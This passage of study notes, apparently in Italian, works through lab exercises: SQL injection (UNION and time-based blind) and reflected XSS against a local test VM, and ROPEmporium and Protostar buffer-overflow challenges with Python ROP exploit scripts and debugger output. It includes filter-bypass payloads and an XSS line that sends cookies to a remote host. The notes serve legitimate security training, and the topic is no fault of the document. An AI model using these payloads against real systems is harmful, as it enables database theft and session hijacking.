      * Far si che la directory di upload non sia eseguibile dall'enginge PHP

  - **SQL Injections**
    - **Example 1**
      
      *URL*
      ```
      http://192.168.122.42/sqli/example1.php?name=root
      ```

      *Fuzzing*
      ```
      ?name='
      => crash => usa quote singola
      ```

      *Exploit - tautologia*
      ```
      ?name=' or 1=1 %23
      ```

      *Exploit - # colonne tabella*
      ```
      ?name=' UNION SELECT 1,2,3,4,5 %23
      => 5 colonne
      ```

      *Exploit - database corrente*
      ```
      ?name=' UNION SELECT database(),2,3,4,5 %23
      => exercises
      ```

      *Exploit - version*
      ```
      ?name=' UNION SELECT version(),2,3,4,5 %23
      => 5.1.66-0+squeeze1
      ```

      *Exploit - user DB*
      ```
      ?name=' UNION SELECT user(),2,3,4,5 %23
      => pentesterlab@localhost
      ```

      *Exploit - database*
      ```
      ?name=' UNION SELECT schema_name,2,3,4,5 FROM information_schema.schemata %23
      => information_schema
      => exercises
      ```


      *Exploit - tabelle di un database*
      ```
      ?name=' UNION SELECT table_name,2,3,4,5 FROM information_schema.tables WHERE table_schema LIKE "exercises" %23
      => users
      ```

      *Exploit - colonne di una tabella*
      ```
      ?name=' UNION SELECT column_name,2,3,4,5 FROM information_schema.columns WHERE table_name LIKE "users" AND table_schema LIKE "exercises" %23
      => id
      => name
      => age
      => groupid
      => passwd
      ```

      *Exploit - tutti i valori della tabella*
      ```
      ?name=' UNION SELECT concat(id, ";", name, ";", age, ";", groupid, ";", passwd),2, 3, 4, 5 from users %23
      => 1;admin;10;10;admin
      => 2;root;30;0;admin21
      => 3;user1;5;2;secret
      => 5;user2;2;5;azerty
      ```

      *Problemi*
      - L'input non è sanitizzato
      - [Vengono stampate tutte le righe della colonna anzichè una]

    - **Example 2**
      
      *URL*
      ```
      http://192.168.122.42/sqli/example2.php?name=root
      ```

      *Fuzzing*
      ```
      ?name='
      => crash => usa quote singola

      ?name=' or 1=1 %23
      => ERROR NO SPACE
      ```

      *Soluzione*
      Usare un token di separazione diverso dallo spazio
      e.g. \n => 0a

      *Exploit - tautologia*
      ```
      ?name='%0aor%0a1=1%0a%23
      ```

      ...

      *Problemi*
      - L'input è sanitizzato mediante una blacklist incompleta
      - [Vengono stampate tutte le righe della colonna anzichè una]

    - **Example 3**
    
      *URL*
      ```
      http://192.168.122.42/sqli/example3.php?name=root
      ```

      *Fuzzing*
      ```
      ?name='
      => crash => usa quote singola

      ?name=' or 1=1 %23
      => ERROR NO SPACE

      ?name='%0aor%0a1=1%0a%23
      => ERROR NO SPACE
      ```

      *Soluzione*
      Usare un token di separazione diverso dai \s greppabili
      e.g. \v => 0b

      Oppure i commenti /**/

      *Exploit - tautologia*
      ```
      ?name='%0bor%0b1=1%0b%23
      ?name='/**/or/**/1=1/**/%23
      ```

      ...

      *Problemi*
      - L'input è sanitizzato mediante una blacklist incompleta
      - [Vengono stampate tutte le righe della colonna anzichè una]

    - **Example 4**

      *URL*
      ```
      http://192.168.122.42/sqli/example4.php?id=2
      ```

      *Fuzzing*
      ```
      ?name='
      ?name="
      ?name=`
      => crash

      ```

      *Soluzione*
      Non viene usato alcun quoting per il parametro numerico

      *Exploit - tautologia*
      ```
      ?id=1 or 1=1
      ```

      ...

      *Problemi*
      - L'input non è sanitizzato
      - [Vengono stampate tutte le righe della colonna anzichè una]

    - **Example 8**

      *URL*
      ```
      http://192.168.122.42/sqli/example8.php?order=name
      ```

      *Fuzzing*
      ```
      ?order=name'
      ?order=name"
      ?order=name`
      => crash

      ```

      *Soluzione*
      Non è possibile usare una tautologia o una UNION perchè è usato un ORDER BY.
      Bisogna fare una query blind con SLEEP e IF, dormendo condizionatamente ad un valore da testare.

      *Fuzzing*
      ```
      ?order=name' or sleep(1)%23
      => crash

      ?order=name" or sleep(1)%23
      => crash

      ?order=name` or sleep(1)%23
      => sleep => usa backtick `

      ```
      *Exploit - Proof Of Concept*
      ```
      ?order=name` or sleep(0.5)%23
      ```

      *Exploit - determinare lunghezza stringa*
      ```
      ?order=name` or IF(LENGTH(database())>5 , sleep(1) , sleep(0) )%23
      => sleep
      ?order=name` or IF(LENGTH(database())>10 , sleep(1) , sleep(0) )%23
      => no sleep
      ?order=name` or IF(LENGTH(database())>8 , sleep(1) , sleep(0) )%23
      => sleep
      ?order=name` or IF(LENGTH(database())=9 , sleep(1) , sleep(0) )%23
      => sleep => 9
      ```

      *Exploit - determinare stringa*
      ```
      ?order=name` or IF(ascii(substring(database(), 1, 1)) > 100, sleep(1), sleep(0))%23
      => sleep
      ?order=name` or IF(ascii(substring(database(), 1, 1)) > 110, sleep(1), sleep(0))%23
      => no sleep
      ?order=name` or IF(ascii(substring(database(), 1, 1)) > 105, sleep(1), sleep(0))%23
      => no sleep
      ?order=name` or IF(ascii(substring(database(), 1, 1)) > 102, sleep(1), sleep(0))%23
      => no sleep
      ?order=name` or IF(ascii(substring(database(), 1, 1)) = 101, sleep(1), sleep(0))%23
      => sleep => 101 => "e"
      ....
      ```


      *Problemi*
      - L'input non è sanitizzato
      - [Vengono stampate tutte le righe della colonna anzichè una]
      - [Il fatto che sia usato un ORDER BY e non un WHERE non toglie la possibilità di iniezione]

  - **XSS**
    - **Example 1 (XSS reflection)**
      *URL*
      ```
      http://192.168.122.42/xss/example1.php?name=hacker
      ```

      *Exploit - Proof Of Concept*
      ```
      ?name=<script>alert(1)</script>
      ```

      *Exploit - stampare cookie localmente*
      ```
      ?name=<script>console.log(document.cookie)</script>
      ```

      *Exploit - inviare informazioni a server remoto*
      ```
      ?name=<img src=x onerror=this.src="http://192.168.1.110:8888/?data=" + document.cookie>
      ```

      *Problemi*
      * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML

    - **Example 2 (XSS reflection)**
      *URL*
      ```
      http://192.168.122.42/xss/example2.php?name=hacker
      ```

      *Fuzzing*
      ```
      ?name=<script>alert(1)</script>
      => Hello alert(1)
      ```

      *Soluzione*
      L'applicazione filtra `<script>`
      => Usare `<Script>`

      *Exploit - Proof Of Concept*
      ```
      ?name=<Script>alert(1)</Script>
      ```

      ....

      *Problemi*
      * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
    - **Example 3 (XSS reflection)**
      *URL*
      ```
      http://192.168.122.42/xss/example3.php?name=hacker
      ```

      *Fuzzing*
      ```
      ?name=<script>alert(1)</script>
      => Hello alert(1)

      ?name=<Script>alert(1)</Script>
      => Hello alert(1)
      ```

      *Soluzione*
      L'applicazione filtra insensitive `script` ma non ricorsivamente
      => Innestare `script`

      *Exploit - Proof Of Concept*
      ```
      ?name=<script<script>>alert(1)</script</script>>
      ```

      ....

      *Problemi*
      * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
    - **Example 4 (XSS reflection)**
      *URL*
      ```
      http://192.168.122.42/xss/example4.php?name=hacker
      ```

      *Fuzzing*
      ```
      ?name=<script>alert(1)</script>
      => Hello alert(1)

      ?name=<Script>alert(1)</Script>
      => Hello alert(1)

      ?name=<script<script>>alert(1)</script</script>>
      => error => crasha se legge 'script'
      ```

      *Soluzione*
      Non usare `script`, ci sono altri modi di iniettare js

      *Exploit - Proof Of Concept*
      ```
      ?name=<img src=x onerror=alert(1)>
      ```

      ....

      *Problemi*
      * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
    - **Example 5 (XSS reflection)**
      *URL*
      ```
      http://192.168.122.42/xss/example5.php?name=hacker
      ```

      *Fuzzing*
      ```
      ?name=<script>alert(1)</script>
      => Hello alert(1)

      ?name=<Script>alert(1)</Script>
      => Hello alert(1)

      ?name=<script<script>>alert(1)</script</script>>
      => error

      ?name=<img src=x onerror=alert(1)>
      => error
      ```

      *Soluzione*
      È un troll, viene filtrato `alert`
      => Usare eval(...) e ed usare `fromCharCode` per offuscare parti di `alert`

      *Exploit - Proof Of Concept*
      ```
      ?name=<script>console.log("work")</script>
      ```
      

      *Exploit - alert*
      ```
      ?name=<script>eval(String.fromCharCode(97)%2b"lert(1)")</script>
      ```

      ....

      *Problemi*
      * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
# ROPEmporium
  - **ret2win (32 bit)**
    *Analisi*
    
    ```
    pwndbg> x/a $esp
    0xffffcda0:	0xffffcdb0

    pwndbg> p $ebp+4
    $1 = (void *) 0xffffcddc

    ----

    ipython
    0xffffcddc-0xffffcdb0=44

    ```
    
    *Exploit*
    `ret2win.py`
    ```python
      """
      44 junk | &ret2win
      """

      ret2win = "\x08\x04\x86\x2c"[::-1]

      print "a" * 44 + ret2win
    ```
    ```sh
    python2 ret2win.py | ./ret2win32

    Well done! Here's your flag:
    ROPE{a_placeholder_32byte_flag!}
    ```
    *Problemi*
    * PIE disabled

  - **split (32 bit)**
    *Analisi*
    `r2 split32`
    ```
    aaaa; aflll
    => usefulFunction

    izz
    => 0x0804a030 è "/bin/cat flag.txt"
    ```

    `gdb split32`
    ```
    pwndbg> x $esp+4
    0xffffced4:	0xffffcee0
    pwndbg> p $ebp+4
    $5 = (void *) 0xffffcf0c
    pwndbg> print "%d", 0xffffcf0c - 0xffffcee0
    $6 = 44
    ```

    *Soluzione*
    - usefulFunction contiene `system`
    - All'indirizzo 0x0804a030 c'è "/bin/cat flag.txt"
    => Unire i pezzi


    *Exploit*
    `split32.py`
    ```python
    """
    44 byte | system | bbbb | &param
    """

    param = "\x08\x04\xa0\x30"[::-1]
    system = "\x08\x04\x83\xe0"[::-1]

    junk_len = 44

    print junk_len * "a" + system + "bbbb" + param
    ```

    ```sh
    python2 split32.py | ./split32

    > Thank you!
    ROPE{a_placeholder_32byte_flag!}
    ```

    *Problemi*
    * PIE disabled
    
  - **callme (32 bit)**
    *Analisi*
    `r2 callme32`
    ```
    aaaa; aflll
    => usefulFunction

    izz
    => 0x0804a030 è "/bin/cat flag.txt"

    [0x08048570]> "/Rq pop;pop;pop;ret"
    0x080487f6: les ecx, [ebx + ebx*2]; pop esi; pop edi; pop ebp; ret;
    0x080487f7: or al, 0x5b; pop esi; pop edi; pop ebp; ret;
    0x080487f8: pop ebx; pop esi; pop edi; pop ebp; ret;
    => 0x080487f9 esegue
      pop esi; 
      pop edi; 
      pop ebp; 
      ret;
    ```

    `gdb callme32`
    ```
    pwndbg> x $esp+4
    0xffffcef4:	0xffffcf00
    pwndbg> p $ebp+4
    $1 = (void *) 0xffffcf2c
    pwndbg> print "%d", 0xffffcf2c - 0xffffcf00
    $2 = 44
    ```

    `objdump -Ds callme32 | grep callme`
    ```
    080484e0 <callme_three@plt>:
    080484f0 <callme_one@plt>:
    08048550 <callme_two@plt>
    ```

    *Soluzione*
    - Bisogna costruire uno stack che chiami le tre funzioni nel giusto ordine con gli opportuni parametri


    *Exploit*
    `callme32.py`
    ```python
    """
    44 junk | c1 | pppr | 1 2 3 | c2 | pppr | 1 2 3 | c3 | pppr | 1 2 3
    """

    c1 = "\x08\x04\x84\xf0"[::-1]
    c2 = "\x08\x04\x85\x50"[::-1]
    c3 = "\x08\x04\x84\xe0"[::-1]
    pppr = "\x08\x04\x87\xf9"[::-1]

    params = "\xde\xad\xbe\xef"[::-1] + "\xca\xfe\xba\xbe"[::-1] + "\xd0\x0d\xf0\x0d"[::-1]

    junk = 44 * "a"

    print junk + c1 + pppr + params + c2 + pppr + params + c3 + pppr + params
    ```

    ```sh
    python2 callme32.py | ./callme32

    > Thank you!
    callme_one() called correctly
    callme_two() called correctly
    ROPE{a_placeholder_32byte_flag!}

    ```

    *Problemi*
    * PIE disabled
    
    
  - **write4 (32 bit)**
    *Analisi*
    `r2 write432`
    ```
    aaaa; aflll
    =>  
      sym.imp.pwnme
      sym.imp.print_file
      sym.usefulFunction

    "/R mov;ret"
      0x08048543               892f  mov dword [edi], ebp
      0x08048545                 c3  ret

    "/R pop;ret"
      0x080485aa                 5f  pop edi
      0x080485ab                 5d  pop ebp
      0x080485ac                 c3  ret
    ```

    `gdb write432`
    ```
    pwndbg> x/x $esp+4
    0xffffcec4:	0xffffced0
    pwndbg> p $ebp+4
    $2 = (void *) 0xffffcefc
    pwndbg> print "%d", 0xffffcefc - 0xffffced0
    $3 = 44
    ```

    `objdump -t write432 | grep bss`
    ```
    0804a020 g       .bss	00000000              __bss_start
    ```

    `objdump -Ds write432 | grep print`
    ```
    080483d0 <print_file@plt>
    ```

    *Soluzione*


    *Exploit*
    `write432.py`
    ```python
    """
    44 junk | ppr | data | "fla." | mr | ppr | data | "txt\0" | mr | print_file | bbbb | data
    """

    data0 = "\x08\x04\xa0\x20"[::-1]
    data4 = "\x08\x04\xa0\x24"[::-1]

    # mov ebp, [edi]
    mr = "\x08\x04\x85\x43"[::-1]

    # pop edi
    # pop ebp
    ppr = "\x08\x04\x85\xaa"[::-1]

    print_file_plt = "\x08\x04\x83\xd0"[::-1]

    junk = 44 * "a"

    print junk + \
            ppr + data0 + "fla." + mr + \
            ppr + data4 + "txt\x00" + mr + \
            print_file_plt + "bbbb" + data0
    ```

    ```sh
    python2 write432.py | ./write432

    > Thank you!
    ROPE{a_placeholder_32byte_flag!}
    ```

    *Problemi*
    * PIE disabled
    
  - **Stack6**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      char buffer[64];

      gets(buffer);
    }
    ```

    *Analisi*
    ```sh
    gdb /opt/protostar/bin/stack6

    (gdb) unset env LINES
    (gdb) unset env COLUMNS

    (gdb) disassemble getpath
    Dump of assembler code for function getpath:
    0x08048484 <getpath+0>:	push   %ebp
    0x08048485 <getpath+1>:	mov    %esp,%ebp
    0x08048487 <getpath+3>:	sub    $0x68,%esp
    0x0804848a <getpath+6>:	mov    $0x80485d0,%eax
    0x0804848f <getpath+11>:	mov    %eax,(%esp)
    0x08048492 <getpath+14>:	call   0x80483c0 <printf@plt>
    0x08048497 <getpath+19>:	mov    0x8049720,%eax
    0x0804849c <getpath+24>:	mov    %eax,(%esp)
    0x0804849f <getpath+27>:	call   0x80483b0 <fflush@plt>
    0x080484a4 <getpath+32>:	lea    -0x4c(%ebp),%eax
    0x080484a7 <getpath+35>:	mov    %eax,(%esp)
    0x080484aa <getpath+38>:	call   0x8048380 <gets@plt>
    0x080484af <getpath+43>:	mov    0x4(%ebp),%eax
    0x080484b2 <getpath+46>:	mov    %eax,-0xc(%ebp)
    0x080484b5 <getpath+49>:	mov    -0xc(%ebp),%eax
    0x080484b8 <getpath+52>:	and    $0xbf000000,%eax
    0x080484bd <getpath+57>:	cmp    $0xbf000000,%eax
    0x080484c2 <getpath+62>:	jne    0x80484e4 <getpath+96>
    0x080484c4 <getpath+64>:	mov    $0x80485e4,%eax
    0x080484c9 <getpath+69>:	mov    -0xc(%ebp),%edx
    0x080484cc <getpath+72>:	mov    %edx,0x4(%esp)
    0x080484d0 <getpath+76>:	mov    %eax,(%esp)
    0x080484d3 <getpath+79>:	call   0x80483c0 <printf@plt>
    0x080484d8 <getpath+84>:	movl   $0x1,(%esp)
    0x080484df <getpath+91>:	call   0x80483a0 <_exit@plt>
    0x080484e4 <getpath+96>:	mov    $0x80485f0,%eax
    0x080484e9 <getpath+101>:	lea    -0x4c(%ebp),%edx
    0x080484ec <getpath+104>:	mov    %edx,0x4(%esp)
    0x080484f0 <getpath+108>:	mov    %eax,(%esp)
    0x080484f3 <getpath+111>:	call   0x80483c0 <printf@plt>
    0x080484f8 <getpath+116>:	leave  
    0x080484f9 <getpath+117>:	ret

    (gdb) b *getpath+38
    (gdb) r

    (gdb) x $esp
    0xbffffc80:	0xbffffc9c

    (gdb) p $ebp
    $2 = (void *) 0xbffffce8

    (gdb) p system
    $2 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
    ---------

    ipython
    In [1]: 0xbffffce8-0xbffffc9c
    Out[1]: 76
    
    ---------
        
    $ objdump -t /opt/protostar/bin/stack6 | grep bss_start
    08049718 g       *ABS*	00000000              __bss_start

    ```

    *ROP Haunting*
    ```sh

    [0x080483d0]> "/Rq mov;ret"
    0x08048448: mov byte [0x8049724], 1; add esp, 4; pop ebx; pop ebp; ret;
    0x08048476: je 0x8048481; mov dword [esp], 0x8049614; call eax; leave; ret;
    0x080484ec: mov dword [esp + 4], edx; mov dword [esp], eax; call 0x80483c0; leave; ret;
    0x080484ee: and al, 4; mov dword [esp], eax; call 0x80483c0; leave; ret;
    0x080484fd: and esp, 0xfffffff0; call 0x8048484; mov esp, ebp; pop ebp; ret;
    0x080484fe: in al, 0xf0; call 0x8048484; mov esp, ebp; pop ebp; ret;
    0x08048510: push ebp; mov ebp, esp; pop ebp; ret;
    0x08048577: pop edi; pop ebp; ret; mov ebx, dword [esp]; ret;
    ```
    VERY BAD
    
    *Memory layout*
    ```
    HIGH
    ====

    ret_addr
    --------
    saved_ebp
    --------    0xbffffce8
    ///////
    --------
    buffer[64]
    --------    0xbffffc9c
    ///////
    &buffer[4]
    --------
    
    ====
    LOW
    ```

    *Exploit*

    `stack6.py`
    ```python
    
    ```

    ```sh

    ```